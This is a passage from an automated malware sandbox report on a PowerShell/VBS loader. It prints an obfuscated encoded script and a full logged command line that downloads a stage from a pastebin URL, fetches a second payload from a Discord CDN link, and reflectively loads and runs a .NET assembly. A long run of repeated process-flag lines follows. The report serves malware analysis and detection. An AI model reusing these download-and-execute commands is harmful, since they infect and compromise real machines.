?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bo?HY?ZQB3?G0?I??9?C??Jw?w?Cc?I??7?CQ?ZwBy?Hg?cwB0?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?Gc?YwBi?Gg?a??g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?ZwBj?GI?a?Bo?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU?a?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?HE?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?m?DQ?MgBk?GI?YgBk?GU?YgBl?DU?NwBj?GI?NwBk?GQ?YQBk?DQ?ZQ?4?GI?O??x?Dg?ZQ?1?Dc?YQBj?Dk?OQ?5?Dg?OQBm?GM?MgBi?Dk?Yg?2?DM?OQ?x?GE?NQ?1?GI?M?Bi?DI?Z?Bm?GQ?ZQ?4?GU?Z?Bk?GQ?NQBl?DE?PQBt?Gg?JgBh?GU?M??z?DI?Mg?3?DY?PQBz?Gk?JgBh?DY?Mg?4?DM?Mg?3?DY?PQB4?GU?PwB0?Hg?d??u?DI?ZQB0?HM?ZQ?v?DM?MQ?x?Dc?M??4?DY?N??0?DI?Mg?x?D??Ng?z?Dk?OQ?y?DE?Lw?x?DI?Nw?4?DU?O??3?DI?NQ?4?Dk?M??x?Dg?Mw?3?Dg?MQ?x?C8?cwB0?G4?ZQBt?Gg?YwBh?HQ?d?Bh?C8?bQBv?GM?LgBw?H??YQBk?HI?bwBj?HM?aQBk?C4?bgBk?GM?Lw?v?Do?cwBw?HQ?d?Bo?Cc?I??s?C??J?Bn?HI?e?Bz?HQ?I??s?C??JwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Gg?dgBl?Hc?bQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.r Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$hvewm = '0' ;$grxst = 'C:\Users\user\Desktop\segura.vbs' ;[Byte[]] $gcbhh = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($gcbhh).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('&42dbbdebe57cb7ddad4e8b818e57ac99989fc2b9b6391a55b0b2dfde8eddd5e1=mh&ae032276=si&a6283276=xe?txt.2etse/3117086442210639921/1278587258901837811/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $grxst , '____________________________________________-------', $hvewm, '1', 'Roda' ));" Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD342C2235 pushad ; iretd 4_2_00007FFD342C232D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD342C22A5 pushad ; iretd 4_2_00007FFD342C232D
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
